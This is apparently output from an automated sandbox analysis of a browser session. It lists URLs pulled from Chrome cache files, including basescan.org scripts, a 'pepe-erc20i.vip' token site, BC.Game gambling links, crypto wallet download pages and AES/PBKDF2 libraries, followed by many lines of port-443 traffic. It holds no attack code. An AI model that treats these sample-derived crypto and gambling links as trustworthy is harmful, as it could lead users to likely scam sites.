            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/custom/web3-eth.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/custom/web3-utils.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/custom/web3.min.js?v=0.5.2.2
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/js/hs.core.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/animate.css/animate.min.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/bootstrap/bootstrap.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/clipboard/dist/clipboard.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/cubeportfolio/js/jquery.cubeportfolio.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/fancybox/jquery.fancybox.min.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/fancybox/jquery.fancybox.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/hs-megamenu/src/hs.megamenu.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/hs-megamenu/src/hs.megamenu.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/jquery-migrate/dist/jquery-migrate.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/jquery/dist/jquery.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.concat.min
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/malihu-custom-scrollbar-plugin/jquery.mCustomScrollbar.css?v=24.4
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/popper.js/dist/umd/popper.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/assets/vendor/select2/dist/css/select2.min.css?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/favicon.ico?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/bcgame_20a.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/bcgame_20c.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/cexio_20.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/cons_20.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/metawin_20.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/gen/stake-4_20.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/logo-ether.svg?v=0.0.7
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/logo-symbol.svg
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/main/empty-token.png
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/main/loadingblock.svg
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/svg/brands/main.svg?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/images/svg/brands/metamask.svg
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/jss/ace/ace.js
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/jss/blockies.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/jss/qrcode.min.js?v=24.4.4.9
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/token/0x28a5e71bfc02723eac17e39c84c5190415c0de9f
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/token/0x28a5e71bfc02723eac17e39c84c5190415c0de9f#disqus
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.org/token/images/
            Source: chromecache_345.2.drString found in binary or memory: https://basescan.statuspage.io/
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/04/6a/27/169345829545598.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/06/81/26/167987965428065.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/0a/69/e8/167987956079571.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/17/8c/bf/167987956519667.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/38/9e/0f/168026392089669.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/49/79/e0/16798797485596.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/4f/d5/3b/167987950051075.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/51/d5/b1/16798797182220.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/55/53/c1/167987969553072.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/56/0a/67/167987967277356.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/610f085f3d.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/69/ba/99/167987971248437.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/6a/40/13/169345811337796.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/70/c1/83/167987957025655.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/753faf5a4f.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/76/31/2a/167987959420881.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/7d75a16c7a.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/99/15/1e/16798796594993.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/a7/8e/75/167987957660547.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/ad7a124fe9.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/ae/c1/f0/167987964312383.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/aec5d58721.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/cd/83/a0/167987972334896.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/d1/63/2a/167987966649744.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/dd/9d/eb/167987974318211.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/ec9bd1c9dc.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/ee/7b/e4/167987962424663.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/f2/aa/1b/167987970173276.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/fa/7c/15/168249638471926.png
            Source: chromecache_944.2.drString found in binary or memory: https://bc.imgix.net/reward_type/fd/65/d6/167988081279280.png
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://bcgame.uk/
            Source: chromecache_444.2.drString found in binary or memory: https://bitkeep.com
            Source: chromecache_444.2.drString found in binary or memory: https://bkapp.vip
            Source: chromecache_767.2.dr, chromecache_706.2.drString found in binary or memory: https://browser.sentry-cdn.com/8.32.0/bundle.min.js
            Source: chromecache_826.2.dr, chromecache_350.2.dr, chromecache_392.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://cct.google/taggy/agent.js
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://cdn.ethers.io/lib/ethers-5.2.umd.min.js
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/web3
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js
            Source: chromecache_444.2.drString found in binary or memory: https://chrome.google.com/webstore/detail/bitkeep-crypto-nft-wallet/jiidiaalihmmhddjgbnbgdfflelocpak
            Source: chromecache_444.2.drString found in binary or memory: https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: chromecache_444.2.drString found in binary or memory: https://chrome.google.com/webstore/detail/okx-wallet/mcohilncbfahbmgdjkbpemcciiolgcge
            Source: chromecache_444.2.drString found in binary or memory: https://chrome.google.com/webstore/detail/trust-wallet/egjidjbpglichdcondbcbdnbeeppgdph
            Source: chromecache_418.2.dr, chromecache_809.2.drString found in binary or memory: https://clipboardjs.com/
            Source: chromecache_324.2.drString found in binary or memory: https://cm.g.doubleclick.net/pixel?google_nid=coveny_limited&google_cm&&google_sc&ckid=FBF29D6B-8D6B
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#cross_origin)
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#display_moment
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/fedcm-migration?s=dc#skipped_moment
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://discord.com/invite/xqUMQesZQq
            Source: chromecache_345.2.drString found in binary or memory: https://disqus.com/?ref_noscript
            Source: chromecache_381.2.dr, chromecache_303.2.dr, chromecache_983.2.dr, chromecache_933.2.dr, chromecache_1024.2.dr, chromecache_487.2.dr, chromecache_898.2.dr, chromecache_926.2.dr, chromecache_605.2.dr, chromecache_552.2.dr, chromecache_677.2.dr, chromecache_600.2.dr, chromecache_353.2.dr, chromecache_970.2.dr, chromecache_746.2.dr, chromecache_393.2.dr, chromecache_1014.2.dr, chromecache_752.2.dr, chromecache_852.2.dr, chromecache_334.2.dr, chromecache_684.2.drString found in binary or memory: https://docs.google.com/forms/d/e/1FAIpQLSc2y9p0GQIZE61bD0JSY4pIt1uc2sK5P3dMXMPqZ9-IeEwF5A/formRespo
            Source: chromecache_345.2.drString found in binary or memory: https://eas.etherscan.com/d3d3/ZGVsaXZlcnk/YXN5bmNqcw==.php
            Source: chromecache_486.2.dr, chromecache_682.2.drString found in binary or memory: https://eas.etherscan.com/d3d3/ZGVsaXZlcnk/YXN5bmNzcGM=.php
            Source: chromecache_345.2.drString found in binary or memory: https://etherscan.io/
            Source: chromecache_385.2.drString found in binary or memory: https://explorer-api.walletconnect.com/v3/logo/lg/5195e9db-94d8-4579-6f11-ef553be95100?projectId=2f0
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://explorer-api.walletconnect.com/v3/logo/lg/7677b54f-3486-46e2-4e37-bf8747814f00?projectId=2f0
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://feross.org
            Source: chromecache_584.2.drString found in binary or memory: https://fontawesome.com
            Source: chromecache_584.2.drString found in binary or memory: https://fontawesome.com/license
            Source: chromecache_996.2.dr, chromecache_379.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins:wght
            Source: chromecache_495.2.dr, chromecache_978.2.drString found in binary or memory: https://getbootstrap.com/)
            Source: chromecache_664.2.dr, chromecache_668.2.drString found in binary or memory: https://github.com/dankogai)
            Source: chromecache_664.2.dr, chromecache_668.2.drString found in binary or memory: https://github.com/dankogai/js-base64/issues/130
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://github.com/emn178/js-sha3
            Source: chromecache_345.2.drString found in binary or memory: https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
            Source: chromecache_495.2.dr, chromecache_978.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
            Source: chromecache_495.2.dr, chromecache_978.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
            Source: chromecache_392.2.drString found in binary or memory: https://google.com
            Source: chromecache_392.2.drString found in binary or memory: https://googleads.g.doubleclick.net
            Source: chromecache_345.2.drString found in binary or memory: https://goto.etherscan.com/rd/HD1A234BEPPNUJM6VZ9YT4886
            Source: chromecache_345.2.drString found in binary or memory: https://goto.etherscan.com/rd/MN32WBX5YSTMGG812VZRIGU57
            Source: chromecache_345.2.drString found in binary or memory: https://goto.etherscan.com/rd/Q4JDBVEF2UBQFTMWKMDBF4T69
            Source: chromecache_345.2.drString found in binary or memory: https://goto.etherscan.com/rd/V8CWKWNIEJ7KIS32XHKH9ASQN
            Source: chromecache_345.2.drString found in binary or memory: https://goto.etherscan.com/rd/XWRE6I4GTMNJDUYGBR14CHH9F
            Source: chromecache_919.2.dr, chromecache_410.2.dr, chromecache_300.2.dr, chromecache_425.2.dr, chromecache_901.2.dr, chromecache_540.2.drString found in binary or memory: https://gsap.com
            Source: chromecache_919.2.dr, chromecache_410.2.dr, chromecache_300.2.dr, chromecache_425.2.dr, chromecache_901.2.dr, chromecache_540.2.drString found in binary or memory: https://gsap.com/standard-license
            Source: chromecache_710.2.dr, chromecache_531.2.dr, chromecache_339.2.drString found in binary or memory: https://hcaptcha.com/license
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://i.gifer.com/ZKZg.gif
            Source: chromecache_324.2.drString found in binary or memory: https://ib.adnxs.com/getuid?https://cms.getblue.io/cm/?src=appnexus&ckid=FBF29D6B-8D6B-4B57-BA2CA3A8
            Source: chromecache_324.2.drString found in binary or memory: https://ib.adnxs.com/setuid?entity=449&code=FBF29D6B-8D6B-4B57-BA2CA3A83CC08BD3
            Source: chromecache_919.2.dr, chromecache_410.2.drString found in binary or memory: https://igagroup.com
            Source: chromecache_345.2.drString found in binary or memory: https://info.etherscan.com/etherscan-token-reputation/
            Source: chromecache_345.2.drString found in binary or memory: https://info.etherscan.com/what-is-verify-address-ownership/
            Source: chromecache_786.2.drString found in binary or memory: https://insights.rtgio.co
            Source: chromecache_444.2.drString found in binary or memory: https://link.trustwallet.com
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://lodash.com/
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://lodash.com/license
            Source: chromecache_345.2.drString found in binary or memory: https://mainnet.base.org/
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://meet.google.com
            Source: chromecache_444.2.drString found in binary or memory: https://metamask.app.link
            Source: chromecache_444.2.drString found in binary or memory: https://metamask.io/
            Source: chromecache_919.2.dr, chromecache_410.2.drString found in binary or memory: https://nlrc-gov.ng/sports-betting-permit/
            Source: chromecache_742.2.dr, chromecache_974.2.drString found in binary or memory: https://npmcdn.com/jsencrypt
            Source: chromecache_508.2.dr, chromecache_542.2.drString found in binary or memory: https://oauth2.googleapis.com/revoke
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://openjsf.org/
            Source: chromecache_737.2.drString found in binary or memory: https://pagead2.googlesyndication.com
            Source: chromecache_826.2.dr, chromecache_350.2.dr, chromecache_392.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
            Source: chromecache_345.2.drString found in binary or memory: https://pepe-erc20i.vip/
            Source: chromecache_444.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.okinc.okex.gp
            Source: chromecache_444.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp
            Source: chromecache_444.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=io.metamask
            Source: chromecache_345.2.drString found in binary or memory: https://sepolia.basescan.org/
            Source: chromecache_345.2.drString found in binary or memory: https://solidity.readthedocs.io/en/v0.5.8/using-the-compiler.html#compiler-input-and-output-json-des
            Source: chromecache_664.2.dr, chromecache_668.2.drString found in binary or memory: https://stackoverflow.com/questions/12710001/how-to-convert-uint8-array-to-base64-encoded-string/127
            Source: chromecache_350.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://t.me/bcgameofficial
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://t.me/bcgamewin
            Source: chromecache_345.2.drString found in binary or memory: https://t.me/pepe_ERC20i
            Source: chromecache_430.2.drString found in binary or memory: https://tailwindcss.com
            Source: chromecache_826.2.dr, chromecache_350.2.dr, chromecache_392.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://td.doubleclick.net
            Source: chromecache_444.2.drString found in binary or memory: https://trustwallet.com/
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://twitter.com/BCGameOfficial
            Source: chromecache_345.2.drString found in binary or memory: https://twitter.com/Pepi_ERC20i
            Source: chromecache_444.2.drString found in binary or memory: https://web3.bitget.com
            Source: chromecache_444.2.drString found in binary or memory: https://web3.bitget.com/en/wallet-download?type=0
            Source: chromecache_883.2.dr, chromecache_385.2.drString found in binary or memory: https://web3modal.com
            Source: chromecache_345.2.drString found in binary or memory: https://www.coingecko.com/en
            Source: chromecache_737.2.drString found in binary or memory: https://www.google.com
            Source: chromecache_392.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://www.googleadservices.com
            Source: chromecache_737.2.drString found in binary or memory: https://www.googletagmanager.com
            Source: chromecache_826.2.dr, chromecache_392.2.drString found in binary or memory: https://www.googletagmanager.com/a?
            Source: chromecache_345.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-TWEL8GRQ12
            Source: chromecache_524.2.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-TR7QDQDP
            Source: chromecache_826.2.dr, chromecache_392.2.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
            Source: chromecache_277.2.dr, chromecache_840.2.drString found in binary or memory: https://www.instagram.com/bcgame/
            Source: chromecache_350.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
            Source: chromecache_444.2.drString found in binary or memory: https://www.okx.com/download
            Source: chromecache_444.2.drString found in binary or memory: https://www.okx.com/web3
            Source: chromecache_350.2.dr, chromecache_578.2.dr, chromecache_588.2.dr, chromecache_737.2.drString found in binary or memory: https://www.youtube.com/iframe_api
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50738
            Source: unknownNetwork traffic detected: HTTP traffic on port 50726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50745
            Source: unknownNetwork traffic detected: HTTP traffic on port 50853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50747
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50741
            Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 50738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50759
            Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50752
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50280 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50761
            Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50612 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50763
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50566 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
